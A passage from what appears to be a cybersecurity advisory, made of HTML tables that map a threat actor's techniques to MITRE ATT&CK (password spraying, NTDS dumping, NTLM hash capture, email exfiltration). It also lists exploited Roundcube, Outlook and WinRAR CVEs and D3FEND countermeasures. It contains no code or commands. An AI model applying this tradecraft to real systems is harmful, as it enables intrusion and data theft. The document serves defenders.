<td>Deleted event logs through the wevtutil utility.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 8: Credential access&nbsp;</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Brute Force&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1110/" target="_blank" title="T1110&nbsp;"><u>T1110</u>&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Sent requests with Base64-encoded credentials for the RTSP server, which included publicly documented default credentials, and likely were generic attempts to brute force access to the devices.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Brute Force: Password Guessing&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001&nbsp;">T1110.001&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Used credential guessing to gain initial access to targeted entities.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Brute Force: Password Spraying&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1110/003/" target="_blank" title="T1110.003">T1110.003</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Used brute force to gain initial access to targeted entities. Conducted a brute force password spray via LDAP.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Multi-Factor Authentication Interception&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1111/" target="_blank" title="T1111&nbsp;">T1111&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Used multi-stage redirectors to provide MFA relaying capabilities in some campaigns.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Input Capture&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1056/" target="_blank" title="T1056&nbsp;">T1056&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW62368817 BCX8">
<div class="OutlineElement Ltr SCXW62368817 BCX8">
<p>Used multi-stage redirectors to provide CAPTCHA relaying capabilities in some campaigns.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p>Forced Authentication&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1187/" target="_blank" title="T1187">T1187</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p>Used an Outlook NTLM vulnerability to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p>OS Credential Dumping: NTDS&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1003/003/" target="_blank" title="T1003.003&nbsp;">T1003.003&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p>Attempted to dump Active Directory NTDS.dit domain databases.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p>Unsecured Credentials: Group Policy Preferences&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1552/006/" target="_blank" title="T1552.006">T1552.006</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW209743542 BCX8">
<div class="OutlineElement Ltr SCXW209743542 BCX8">
<p>Retrieved plaintext passwords via Group Policy Preferences using Get-GPPPassword.py.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 9: Discovery</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p>Account Discovery: Domain Account</p>
<br />
</td>
<td>
<br />
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1087/002/" target="_blank" title="T1087.002">T1087.002</a></p>
</td>
<td>
<br />
<p>Used a modified ldap-dump.py to enumerate the Windows environment.</p>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 10: Command and Control</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW38262447 BCX8">
<div class="OutlineElement Ltr SCXW38262447 BCX8">
<p>Hide Infrastructure&nbsp;</p>
</div>
</div>
</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1665/" target="_blank" title="T1665">T1665</a>&nbsp;</td>
<td>
<div class="TableCellContent SCXW72409955 BCX8">
<div class="OutlineElement Ltr SCXW72409955 BCX8">
<p>Abused SOHO devices to facilitate covert cyber operations, as well as proxy malicious activity, via devices with geolocation in proximity to the target.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW38262447 BCX8">
<div class="OutlineElement Ltr SCXW38262447 BCX8">
<p>Proxy: External Proxy&nbsp;</p>
</div>
</div>
</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/002/" target="_blank" title="T1090.002">T1090.002</a>&nbsp;</td>
<td>
<div class="TableCellContent SCXW72409955 BCX8">
<div class="OutlineElement Ltr SCXW72409955 BCX8">
<p>Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW38262447 BCX8">
<div class="OutlineElement Ltr SCXW38262447 BCX8">
<p>Proxy: Multi-hop Proxy&nbsp;</p>
</div>
</div>
</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1090/003/" target="_blank" title="T1090.003">T1090.003</a>&nbsp;</td>
<td>
<div class="TableCellContent SCXW72409955 BCX8">
<div class="OutlineElement Ltr SCXW72409955 BCX8">
<p>Used Tor and commercial VPNs as part of their anonymization infrastructure&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW38262447 BCX8">
<div class="OutlineElement Ltr SCXW38262447 BCX8">
<p>Encrypted Channel&nbsp;</p>
</div>
</div>
</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1573/" title="T1573 ">T1573&nbsp;</a></td>
<td>
<div class="TableCellContent SCXW72409955 BCX8">
<div class="OutlineElement Ltr SCXW72409955 BCX8">
<p>Connected to victim infrastructure using encrypted TLS.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW38262447 BCX8">
<div class="OutlineElement Ltr SCXW38262447 BCX8">
<p>Multi-Stage Channels&nbsp;</p>
</div>
</div>
</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1104/" target="_blank" title="T1104 ">T1104&nbsp;</a></td>
<td>
<div class="TableCellContent SCXW72409955 BCX8">
<div class="OutlineElement Ltr SCXW72409955 BCX8">
<p>Used multi-stage redirectors for campaigns.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 11: Defense evasion (mobile framework)</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW9501464 BCX8">
<div class="OutlineElement Ltr SCXW9501464 BCX8">
<p>Execution Guardrails&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW9501464 BCX8">
<div class="OutlineElement Ltr SCXW9501464 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1627/" target="_blank" title="T1627&nbsp;">T1627&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW9501464 BCX8">
<div class="OutlineElement Ltr SCXW9501464 BCX8">
<p>Used multi-stage redirectors to verify browser fingerprints in some campaigns.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW9501464 BCX8">
<div class="OutlineElement Ltr SCXW9501464 BCX8">
<p>Execution Guardrails: Geofencing&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW9501464 BCX8">
<div class="OutlineElement Ltr SCXW9501464 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1627/001/" target="_blank" title="T1627.001&nbsp;">T1627.001&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW9501464 BCX8">
<div class="OutlineElement Ltr SCXW9501464 BCX8">
<p>Used multi-stage redirectors to verify IP-geolocation in some campaigns.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 12: Lateral movement</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW171769894 BCX8">
<div class="OutlineElement Ltr SCXW171769894 BCX8">
<p>Lateral Movement&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW171769894 BCX8">
<div class="OutlineElement Ltr SCXW171769894 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/tactics/TA0008/" target="_blank" title="TA0008&nbsp;">TA0008&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW171769894 BCX8">
<div class="OutlineElement Ltr SCXW171769894 BCX8">
<p>Used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW171769894 BCX8">
<div class="OutlineElement Ltr SCXW171769894 BCX8">
<p>Remote Services: Remote Desktop Protocol&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW171769894 BCX8">
<div class="OutlineElement Ltr SCXW171769894 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1021/001/" target="_blank" title="T1021.001">T1021.001</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW171769894 BCX8">
<div class="OutlineElement Ltr SCXW171769894 BCX8">
<p>Moved laterally within the network using RDP.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 13: Collection</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Email Collection&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1114/" target="_blank" title="T1114">T1114</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Retrieved sensitive data from email servers.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Email Collection: Remote Email Collection&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1114/002/" target="_blank" title="T1114.002&nbsp;">T1114.002&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Used server data exchange protocols and APIs such as Exchange Web Services (EWS) and IMAP to exfiltrate data from email servers.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Automated Collection&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1119/" target="_blank" title="T1119">T1119</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Used periodic EWS queries to collect new emails.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Video Capture&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1125/" target="_blank" title="T1125">T1125</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Attempted to gain access to the cameras’ feeds.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Archive Collected Data&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1560/" target="_blank" title="T1560">T1560</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Accessed files were archived in .zip files prior to exfiltration.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Archive Collected Data: Archive via Utility&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1560/001/" target="_blank" title="T1560.001&nbsp;">T1560.001&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW86067930 BCX8">
<div class="OutlineElement Ltr SCXW86067930 BCX8">
<p>Prepared zip archives for upload to the actors’ infrastructure.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 14: Exfiltration</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW154941500 BCX8">
<div class="OutlineElement Ltr SCXW154941500 BCX8">
<p>Exfiltration Over Alternative Protocol&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW154941500 BCX8">
<div class="OutlineElement Ltr SCXW154941500 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1048/" target="_blank" title="T1048&nbsp;">T1048&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW154941500 BCX8">
<div class="OutlineElement Ltr SCXW154941500 BCX8">
<p>Attempted to exfiltrate archived data via a previously dropped OpenSSH binary.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW154941500 BCX8">
<div class="OutlineElement Ltr SCXW154941500 BCX8">
<p>Scheduled Transfer&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW154941500 BCX8">
<div class="OutlineElement Ltr SCXW154941500 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1029/" target="_blank" title="T1029">T1029</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW154941500 BCX8">
<div class="OutlineElement Ltr SCXW154941500 BCX8">
<p>Used periodic EWS queries to collect new emails sent and received since the last data exfiltration.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<br />
<h2><strong>Appendix B: CVEs exploited</strong></h2>
<table class="tablesaw tablesaw-stack">
<caption>Table 15: Exploited CVE information</caption>
<thead>
<tr>
<th role="columnheader"><strong>CVE&nbsp;</strong></th>
<th role="columnheader"><strong>Vendor/Product&nbsp;</strong></th>
<th role="columnheader"><strong>Details</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" title="CVE-2023-38831&nbsp;">CVE-2023-38831&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>RARLAB WinRAR&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Allows execution of arbitrary code when a user attempts to view a benign file within a ZIP archive.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-23397" target="_blank" title="CVE-2023-23397">CVE-2023-23397</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Microsoft Outlook&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>External actors could send specially crafted emails that cause a connection from the victim to an untrusted location of the actor’s control, leaking the Net-NTLMv2 hash of the victim that the actor could then relay to another service to authenticate as the victim.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44026" target="_blank" title="CVE-2021-44026&nbsp;">CVE-2021-44026&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Roundcube Webmail&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search params.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-35730" target="_blank" title="CVE-2020-35730">CVE-2020-35730&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Roundcube Webmail&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>An XSS issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16 and 1.4.x before 1.4.10, where a plaintext email message with JavaScript in a link reference element is mishandled by linkref_addindex in rcube_string_replacer.php.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12641" target="_blank" title="CVE-2020-12641&nbsp;">CVE-2020-12641&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Roundcube Webmail&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW153144328 BCX8">
<div class="OutlineElement Ltr SCXW153144328 BCX8">
<p>Roundcube Webmail before 1.4.4 allows arbitrary code execution via shell metacharacters in a configuration setting for im_convert_path or im_identify_path in rcube_image.php.&nbsp;</p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<h2><strong>Appendix C: MITRE D3FEND Countermeasures</strong></h2>
<table class="tablesaw tablesaw-stack">
<caption>Table 16: MITRE D3FEND countermeasures</caption>
<thead>
<tr>
<th role="columnheader"><strong>Countermeasure Title&nbsp;</strong></th>
<th role="columnheader"><strong>ID&nbsp;</strong></th>
<th role="columnheader"><strong>Details&nbsp;</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p>Network Isolation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:NetworkIsolation/" target="_blank" title="D3-NI">D3-NI</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW175383487 BCX8">
<div class="OutlineElement Ltr SCXW175383487 BCX8">
<p>Employ appropriate network segmentation. Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW178495602 BCX8">
<div class="OutlineElement Ltr SCXW178495602 BCX8">
<p>Access Mediation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW178495602 BCX8">
<div class="OutlineElement Ltr SCXW178495602 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:AccessMediation/" target="_blank" title="D3-AMED ">D3-AMED&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW178495602 BCX8">
<div class="OutlineElement Ltr SCXW178495602 BCX8">
<p>Limit access and utilize additional attributes (such as device information, environment, and access path) when making access decisions. Configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p>Inbound Traffic Filtering&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering/" target="_blank" title="D3-ITF">D3-ITF</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW19928184 BCX8">
<div class="OutlineElement Ltr SCXW19928184 BCX8">
<p>Implement host firewall rules to block connections from other devices on the network, other than from authorized management devices and servers, to prevent lateral movement.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW68203701 BCX8">
<div class="OutlineElement Ltr SCXW68203701 BCX8">
<p>Resource Access Pattern Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW68203701 BCX8">
<div class="OutlineElement Ltr SCXW68203701 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ResourceAccessPatternAnalysis/" target="_blank" title="D3-RAPA ">D3-RAPA&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW68203701 BCX8">
<div class="OutlineElement Ltr SCXW68203701 BCX8">
<p>Use automated tools to audit access logs for security concerns and identify anomalous access requests.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p>Outbound Traffic Filtering&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering/" target="_blank" title="D3-OTF">D3-OTF</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW265882884 BCX8">
<div class="OutlineElement Ltr SCXW265882884 BCX8">
<p>Block NTLM/SMB requests to external infrastructure.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p>Platform Monitoring&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:PlatformMonitoring/" target="_blank" title="D3-PM ">D3-PM&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW15743482 BCX8">
<div class="OutlineElement Ltr SCXW15743482 BCX8">
<p>Install EDR/logging/cybersecurity solutions onto high value systems with large amounts of sensitive data such as mail servers and domain controllers.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW182935753 BCX8">
<div class="OutlineElement Ltr SCXW182935753 BCX8">
<p>System File Analysis&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW182935753 BCX8">
<div class="OutlineElement Ltr SCXW182935753 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis/" target="_blank" title="D3-SFA">D3-SFA</a>&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW182935753 BCX8">
<div class="OutlineElement Ltr SCXW182935753 BCX8">
<p>Collect and monitor Windows logs for certain events, especially for events that indicate that a log was cleared unexpectedly.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW49529923 BCX8">
<div class="OutlineElement Ltr SCXW49529923 BCX8">
<p>Application Hardening&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW49529923 BCX8">
<div class="OutlineElement Ltr SCXW49529923 BCX8">
<p><a href="https://d3fend.mitre.org/technique/d3f:ApplicationHardening/" target="_blank" title="D3-AH ">D3-AH&nbsp;</a></p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW49529923 BCX8">
<div class="OutlineElement Ltr SCXW49529923 BCX8">
<p>Enable optional security features in Windows to harden endpoints and mitigate initial access techniques.&nbsp;</p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW255940012 BCX8">
<div class="OutlineElement Ltr SCXW255940012 BCX8">
<p>Application-based Process Isolation&nbsp;</p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW255940012 BCX8">
<div class="OutlineElement Ltr SCXW255940012 BCX8">
